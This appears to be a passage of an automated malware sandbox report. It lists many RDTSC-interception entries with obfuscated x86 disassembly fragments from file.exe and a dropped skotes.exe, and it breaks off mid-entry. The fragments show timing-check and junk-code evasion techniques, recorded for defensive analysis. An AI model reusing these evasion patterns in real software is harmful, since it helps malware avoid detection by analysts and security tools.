Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60B05 second address: 4C60B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60B0B second address: 4C60B47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop ecx 0x00000012 call 00007F12C08324D9h 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD090A second address: 4CD0910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0D8C second address: 4CC0DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C08324D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0DA4 second address: 4CC0DBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0DBC second address: 4CC0DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0DC0 second address: 4CC0DD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0DD2 second address: 4CC0DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70165 second address: 4C70190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov bx, 6ADCh 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c jmp 00007F12C15B731Bh 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F12C15B731Eh 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD01CA second address: 4CD024A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F12C08324D7h 0x0000000d mov ebp, esp 0x0000000f jmp 00007F12C08324D6h 0x00000014 push dword ptr [ebp+0Ch] 0x00000017 jmp 00007F12C08324D0h 0x0000001c push dword ptr [ebp+08h] 0x0000001f jmp 00007F12C08324D0h 0x00000024 push DFDA6FA7h 0x00000029 jmp 00007F12C08324D1h 0x0000002e add dword ptr [esp], 2026905Bh 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD024A second address: 4CD0250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0283 second address: 4CD0287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0287 second address: 4CD028D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD028D second address: 4CD02D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12C08324D8h 0x00000009 or cl, 00000018h 0x0000000c jmp 00007F12C08324CBh 0x00000011 popfd 0x00000012 mov cx, 8BCFh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 movzx eax, al 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F12C08324D1h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD02D5 second address: 4CD02F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD02F1 second address: 4CD02F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C803F8 second address: 4C803FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C803FE second address: 4C80404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80404 second address: 4C80408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80408 second address: 4C80437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d mov ah, 8Eh 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 mov dx, ax 0x00000015 mov cl, B3h 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F12C08324D4h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80437 second address: 4C8045B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 63FDC5C4h 0x00000008 jmp 00007F12C15B731Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov cx, 9763h 0x00000017 push eax 0x00000018 push edx 0x00000019 mov bx, si 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8045B second address: 4C8045F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8045F second address: 4C80489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push FFFFFFFEh 0x00000009 pushad 0x0000000a mov ecx, 2E111F53h 0x0000000f mov esi, 4A045DAFh 0x00000014 popad 0x00000015 push 41FE095Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F12C15B731Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80489 second address: 4C8049B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C08324CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8049B second address: 4C8049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8049F second address: 4C8051F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 36BFC945h 0x0000000f jmp 00007F12C08324D7h 0x00000014 push 586A1549h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F12C08324D5h 0x00000020 sbb ecx, 6AFBF5D6h 0x00000026 jmp 00007F12C08324D1h 0x0000002b popfd 0x0000002c mov di, ax 0x0000002f popad 0x00000030 xor dword ptr [esp], 2F52BB49h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F12C08324D9h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8051F second address: 4C80562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f jmp 00007F12C15B731Eh 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F12C15B7327h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80562 second address: 4C8058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F12C08324CCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8058E second address: 4C805A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C15B731Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805A0 second address: 4C805A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805A4 second address: 4C80605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a call 00007F12C15B731Dh 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 movsx edi, ax 0x00000015 popad 0x00000016 sub esp, 1Ch 0x00000019 pushad 0x0000001a call 00007F12C15B7320h 0x0000001f mov ecx, 660CFEA1h 0x00000024 pop ecx 0x00000025 popad 0x00000026 push ebx 0x00000027 jmp 00007F12C15B731Ah 0x0000002c mov dword ptr [esp], ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 call 00007F12C15B7323h 0x00000039 pop eax 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80605 second address: 4C80616 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80616 second address: 4C8061A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8061A second address: 4C80629 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80629 second address: 4C806BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F12C15B731Eh 0x00000010 xchg eax, esi 0x00000011 jmp 00007F12C15B7320h 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 mov dx, ax 0x0000001b mov ecx, 59AB86E9h 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007F12C15B731Fh 0x00000027 xchg eax, edi 0x00000028 pushad 0x00000029 jmp 00007F12C15B7324h 0x0000002e call 00007F12C15B7322h 0x00000033 jmp 00007F12C15B7322h 0x00000038 pop eax 0x00000039 popad 0x0000003a mov eax, dword ptr [7743B370h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F12C15B731Ch 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C806BD second address: 4C80765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushfd 0x00000006 jmp 00007F12C08324CDh 0x0000000b or esi, 748F0A66h 0x00000011 jmp 00007F12C08324D1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xor dword ptr [ebp-08h], eax 0x0000001d pushad 0x0000001e mov cl, 81h 0x00000020 call 00007F12C08324D9h 0x00000025 pop edi 0x00000026 popad 0x00000027 xor eax, ebp 0x00000029 jmp 00007F12C08324D3h 0x0000002e nop 0x0000002f jmp 00007F12C08324D6h 0x00000034 push eax 0x00000035 jmp 00007F12C08324CBh 0x0000003a nop 0x0000003b pushad 0x0000003c mov edi, esi 0x0000003e push esi 0x0000003f movsx edi, si 0x00000042 pop eax 0x00000043 popad 0x00000044 lea eax, dword ptr [ebp-10h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F12C08324D2h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80765 second address: 4C8076B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8076B second address: 4C8076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8076F second address: 4C807F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e pushad 0x0000000f mov ecx, ebx 0x00000011 mov ax, bx 0x00000014 popad 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 call 00007F12C15B7323h 0x0000001e mov esi, 17E796EFh 0x00000023 pop ecx 0x00000024 call 00007F12C15B7325h 0x00000029 movzx eax, di 0x0000002c pop ebx 0x0000002d popad 0x0000002e mov eax, dword ptr [esi+10h] 0x00000031 jmp 00007F12C15B7328h 0x00000036 test eax, eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F12C15B7327h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70F36 second address: 4C70F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70F3A second address: 4C70F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F12C15B7326h 0x0000000c add ecx, 41C500E8h 0x00000012 jmp 00007F12C15B731Bh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F12C15B7329h 0x0000001f xchg eax, ebp 0x00000020 jmp 00007F12C15B731Eh 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push ebx 0x0000002b pop esi 0x0000002c push edx 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70F9D second address: 4C70FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70FA3 second address: 4C70FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70FA7 second address: 4C70FC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F12C08324CFh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 18F794 second address: 18EFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007F12C15B7328h 0x00000011 nop 0x00000012 clc 0x00000013 push dword ptr [ebp+122D01E1h] 0x00000019 jno 00007F12C15B7322h 0x0000001f call dword ptr [ebp+122D1DCFh] 0x00000025 pushad 0x00000026 add dword ptr [ebp+122D31A4h], ebx 0x0000002c xor eax, eax 0x0000002e xor dword ptr [ebp+122D31A4h], ebx 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 xor dword ptr [ebp+122D31A4h], ebx 0x0000003e mov dword ptr [ebp+122D3C55h], eax 0x00000044 mov dword ptr [ebp+122D1D49h], eax 0x0000004a mov esi, 0000003Ch 0x0000004f mov dword ptr [ebp+122D1D49h], edi 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 sub dword ptr [ebp+122D31A4h], eax 0x0000005f lodsw 0x00000061 pushad 0x00000062 mov dword ptr [ebp+122D31A4h], ecx 0x00000068 mov bx, F570h 0x0000006c popad 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jbe 00007F12C15B7317h 0x00000077 cld 0x00000078 jno 00007F12C15B731Dh 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D1C96h], eax 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b jmp 00007F12C15B7325h 0x00000090 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 308AF8 second address: 308AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307A8B second address: 307A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307A8F second address: 307A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307A93 second address: 307A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307A9F second address: 307AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F12C08324C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307AB5 second address: 307AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307AB9 second address: 307AC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307AC2 second address: 307AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C15B731Eh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307AD5 second address: 307AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C08324CAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307F2C second address: 307F36 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F12C15B7316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307F36 second address: 307F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F12C08324C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 307F49 second address: 307F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F12C15B7316h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309D06 second address: 309D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 jp 00007F12C08324DCh 0x0000000d jmp 00007F12C08324D6h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F12C08324D3h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F12C08324CFh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309D5A second address: 309D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309D5E second address: 18EFC4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F12C08324C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F12C08324C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D3BD1h] 0x0000002c push dword ptr [ebp+122D01E1h] 0x00000032 mov ecx, 67773A99h 0x00000037 call dword ptr [ebp+122D1DCFh] 0x0000003d pushad 0x0000003e add dword ptr [ebp+122D31A4h], ebx 0x00000044 xor eax, eax 0x00000046 xor dword ptr [ebp+122D31A4h], ebx 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 xor dword ptr [ebp+122D31A4h], ebx 0x00000056 mov dword ptr [ebp+122D3C55h], eax 0x0000005c mov dword ptr [ebp+122D1D49h], eax 0x00000062 mov esi, 0000003Ch 0x00000067 mov dword ptr [ebp+122D1D49h], edi 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 sub dword ptr [ebp+122D31A4h], eax 0x00000077 lodsw 0x00000079 pushad 0x0000007a mov dword ptr [ebp+122D31A4h], ecx 0x00000080 mov bx, F570h 0x00000084 popad 0x00000085 add eax, dword ptr [esp+24h] 0x00000089 jbe 00007F12C08324C7h 0x0000008f cld 0x00000090 jno 00007F12C08324CDh 0x00000096 mov ebx, dword ptr [esp+24h] 0x0000009a mov dword ptr [ebp+122D1C96h], eax 0x000000a0 push eax 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 jmp 00007F12C08324D5h 0x000000a8 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309DEB second address: 309E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnc 00007F12C15B731Ch 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F12C15B7324h 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 jmp 00007F12C15B731Bh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309E2E second address: 309E38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F12C08324CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309E38 second address: 309E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309E48 second address: 309E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309E4C second address: 309E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309FBC second address: 309FCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309FCF second address: 309FE3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F12C15B7318h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: 309FE3 second address: 30A0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F12C08324CFh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 pop eax 0x00000017 pop eax 0x00000018 xor di, AFE0h 0x0000001d push 00000003h 0x0000001f pushad 0x00000020 movzx ebx, di 0x00000023 mov dword ptr [ebp+122D1D44h], eax 0x00000029 popad 0x0000002a push 00000000h 0x0000002c mov edx, dword ptr [ebp+122D3D99h] 0x00000032 push 00000003h 0x00000034 jmp 00007F12C08324D7h 0x00000039 push E85115B7h 0x0000003e jmp 00007F12C08324D4h 0x00000043 xor dword ptr [esp], 285115B7h 0x0000004a mov dword ptr [ebp+122D3474h], edi 0x00000050 